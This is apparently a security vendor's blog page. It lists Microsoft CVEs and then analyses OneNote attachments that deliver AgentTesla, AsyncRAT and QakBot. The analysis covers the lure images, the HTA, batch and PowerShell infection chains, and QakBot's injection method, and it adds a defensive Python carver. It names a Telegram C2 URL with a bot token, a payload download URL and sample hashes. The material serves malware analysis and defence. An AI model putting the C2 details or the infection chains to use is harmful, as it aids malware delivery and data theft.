CVE-2023-21564 Azure DevOps Server Cross-Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21566 Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21567 Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21568 Microsoft SQL Server Integration Service (VS extension) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21570 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21571 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21572 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21573 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21684 Microsoft PostScript Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21685 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21686 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21687 HTTP.sys Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21691 Microsoft Protected Extensible Authentication Protocol (PEAP) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21693 Microsoft PostScript Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21694 Windows Fax Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21695 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21697 Windows Internet Storage Name Service (iSNS) Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21699 Windows Internet Storage Name Service (iSNS) Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21700 Windows iSCSI Discovery Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21701 Microsoft Protected Extensible Authentication Protocol (PEAP) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21702 Windows iSCSI Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21703 Azure Data Box Gateway Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21704 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21705 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21707 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21710 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21713 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21714 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21716 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21717 Microsoft SharePoint Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21718 Microsoft SQL ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21721 Microsoft OneNote Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-21722 .NET Framework Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21777 Azure App Service on Azure Stack Hub Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21778 Microsoft Dynamics Unified Service Desk Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21797 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21798 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21799 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21800 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21801 Microsoft PostScript Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21802 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21803 Windows iSCSI Discovery Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21804 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21805 Windows MSHTML Platform Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21806 Power BI Report Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-21807 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21808 .NET and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21809 Microsoft Defender for Endpoint Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-21811 Windows iSCSI Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21813 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21815 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21816 Windows Active Directory Domain Services API Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21817 Windows Kerberos Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21818 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21819 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21820 Windows Distributed File System (DFS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21822 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-23377 3D Builder Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23378 Print 3D Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23379 Microsoft Defender for IoT Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-23381 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23382 Azure Machine Learning Compute Instance Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-23390 3D Builder Remote Code Execution Vulnerability
There are no known exploits in the wild.

Microsoft OneNote files are widely used to deliver malware payloads

There is a never-ending race between threat actors and security software. Malware authors constantly look for techniques that get past active security defenses to gain access to the victim's machine, and one such technique is switching among low-profile file types to carry the malicious payload. Malware authors are now using OneNote files, which were rarely used for malicious purposes in the past. For the last few weeks, SonicWall RTDMI has been detecting a spike of malicious OneNote files delivered to the victim's machine as email attachments. The SonicWall threat research team observed that these OneNote files deliver AgentTesla, AsyncRAT and QakBot malware. Threat actors attach HTML Application (HTA) files, batch files and Portable Executable (PE) files to OneNote pages and hide the attachments behind an image. The image displays a message luring the victim to click on it; the click lands on the hidden attachment, which triggers the malware execution:
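OneNote stores every attached file inside a FileDataStoreObject (documented in [MS-ONESTORE]) that begins with a fixed header GUID, so an analyst can carve the attachments out of a .one file without opening it in OneNote. The following Python is an added example, not code from the SonicWall post: it carves the objects, classifies each by its leading bytes and reports the HTA, batch and PE attachments the cases below rely on. The sample .one content is constructed inline; the `build_fdso` helper exists only to build it.

```python
"""Added example (not the post's code): carve OneNote attachments (FileDataStoreObject, [MS-ONESTORE]) and flag executable ones."""
import re
import struct

# Header GUID {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} and footer GUID {71FBA722-0F79-4A0B-BB13-899256426B24} as laid out on disk
FDSO_HEADER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")
FDSO_FOOTER = bytes.fromhex("22a7fb71790f0b4abb13899256426b24")
FDSO_FIELDS = "<QIQ"  # after the header GUID: cbLength (uint64), unused (uint32), reserved (uint64)
EXECUTABLE_KINDS = {"pe", "hta", "batch"}

def carve_attachments(data: bytes) -> list[bytes]:
    """Return the raw bytes of every FileDataStoreObject whose length field is plausible."""
    found = []
    for m in re.finditer(re.escape(FDSO_HEADER), data):
        off = m.end()
        if off + struct.calcsize(FDSO_FIELDS) > len(data):
            break
        length, _unused, _reserved = struct.unpack_from(FDSO_FIELDS, data, off)
        start = off + struct.calcsize(FDSO_FIELDS)
        if length > len(data) - start:  # truncated file or corrupt length: skip this object
            continue
        found.append(data[start:start + length])
    return found

def classify(blob: bytes) -> str:
    """Triage-grade type guess from the leading bytes of an attachment."""
    head = blob.lstrip()[:512].lower()
    if blob.startswith(b"MZ"):
        return "pe"
    if b"<hta:application" in head or b"<script" in head or b"<html" in head:
        return "hta"
    if head.startswith((b"@echo", b"set ", b"cmd ", b"powershell", b"start ")):
        return "batch"
    return "unknown"

def suspicious_attachments(data: bytes) -> list[tuple[str, int]]:
    """(kind, size) for every carved attachment that is executable content."""
    return [(kind, len(blob)) for blob in carve_attachments(data)
            if (kind := classify(blob)) in EXECUTABLE_KINDS]

def build_fdso(payload: bytes) -> bytes:
    """Wrap a payload in a FileDataStoreObject; used only to build the constructed sample."""
    return FDSO_HEADER + struct.pack(FDSO_FIELDS, len(payload), 0, 0) + payload + FDSO_FOOTER

# Constructed sample .one content: a lure image, a harmless batch file and a PE stub, with filler between
SAMPLE_BATCH = b"@echo off\r\necho constructed sample\r\n"
SAMPLE_PE = b"MZ" + b"\x90" * 200
SAMPLE_ONE = (b"\x00" * 16 + build_fdso(b"\x89PNG\r\n\x1a\n" + b"\x00" * 64)
              + b"\xff" * 8 + build_fdso(SAMPLE_BATCH) + build_fdso(SAMPLE_PE))
```

Running `suspicious_attachments` over a real .one file lists the executable attachments (here the batch file and the PE stub) while the lure image is ignored; a length field that points past the end of the file is treated as corrupt and skipped rather than trusted.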

Case 1 (Payload: AgentTesla)

The threat actor attaches a malicious HTML Application (HTA) file to the OneNote page and duplicates the attachment references to widen the area in which a click reaches the attachment. The attachments are hidden behind two overlapping images: a blurred image, overlaid by a second image that asks the user to “View Document”. Once the user clicks the image, the hidden HTA file executes:

The HTA file launches two PowerShell instances, one to display an image from the web and the other to download and execute the AgentTesla malware on the victim's machine:

The blurred HSBC document fetched from the web is displayed to mislead the user while the malicious activity runs in the background:

The second PowerShell instance starts the downloaded executable in the background, which in turn runs a VBScript file and injects the AgentTesla payload into RegSvcs.exe. The payload exfiltrates user data to its Telegram-hosted Command and Control (C2) server h[t][t]ps://api.telegram.org/bot5729374237:AAEdSD-W5rWlJyyU5nwVKvjLxJBT1jTdKRY/:

Case 2 (Payload: AsyncRAT)

The threat actor attaches an obfuscated batch file to the OneNote page. The attachment is hidden behind an image that asks the user to “Click to view document”. The page's background image displays the text DHL WORLDWIDE EXPRESS to pass the file off as a delivery document:

The obfuscated batch file drops a copy of the PowerShell executable into the OneNote temp folder under the name “invoice.bat.exe” and uses that copy to run a PowerShell script:

The PowerShell script reads data from the batch file and decrypts it. The decrypted data is decompressed to obtain the AsyncRAT executable, which is then executed:

AsyncRAT is a widely known malware family and its source code is available on GitHub:

In one AsyncRAT-delivering variant, we have seen the OneNote page carry an executable attachment that in turn drops a batch file to continue the chain, which ends with AsyncRAT running on the victim's machine:

Case 3 (Payload: QakBot)

The threat actor attaches a batch commands file to the OneNote page. The attachment is hidden behind an image labelled “Open”. The page also contains an image displaying the text “This document contains attachments from the cloud, to receive them, double click “open””:

The batch commands file runs a PowerShell cmdlet that drops another batch file to C:\Users\Public\aSUNY81.cmd and executes it with two arguments:

The dropped script downloads the QakBot payload from the URL h[t][t]ps://famille2point0.com/oghHO/01.png, which is passed in as the second argument. The QakBot Dynamic Link Library (DLL) is executed by calling its export function Wind:

QakBot injects the malicious payload into iexplorer.exe using process injection. The QakBot binary uses the traditional method: it starts iexplorer.exe in suspended mode using the CreateProcess API, allocates memory in iexplorer.exe and writes the payload into it. After injecting the code, most malware redirects the Instruction Pointer (EIP) to the injected code using the SetThreadContext API, but QakBot instead overwrites the bytes at EIP with a jump to the injected code:

IOCs

SHA256 OneNote files:
8fc8a2b79cb0c0f8113993056e682cd9b56140781cad6bfeabfeac8e6df543e1
1d27ed598f1eab480f067c8920d8f9cd7f7da8b1833d0f58f75d2e2944589210
0a001cf1fd5f6d6994a1635f87493723ba6c6299b67fdf1569c341c87b8aeda1

SHA256 PE files:
b75aad495d0bff2f1b5a2b89a8df42a9257f1f01394c859f3ad2bb40d91607d3
a18402d77acd4d9c8b9ae637ffb8ef44b566c777902bb95d81a8cb6c23fec9e7
53a1cbccdb9988dca39ce32963a951b4f8b9d843db57c288195e1cd160bd7f17

The absence of the archive file from popular threat intelligence sharing portals such as VirusTotal and ReversingLabs indicates its uniqueness and limited distribution:

Evidence of detection by the RTDMI™ engine can be seen below in the Capture ATP report for this file: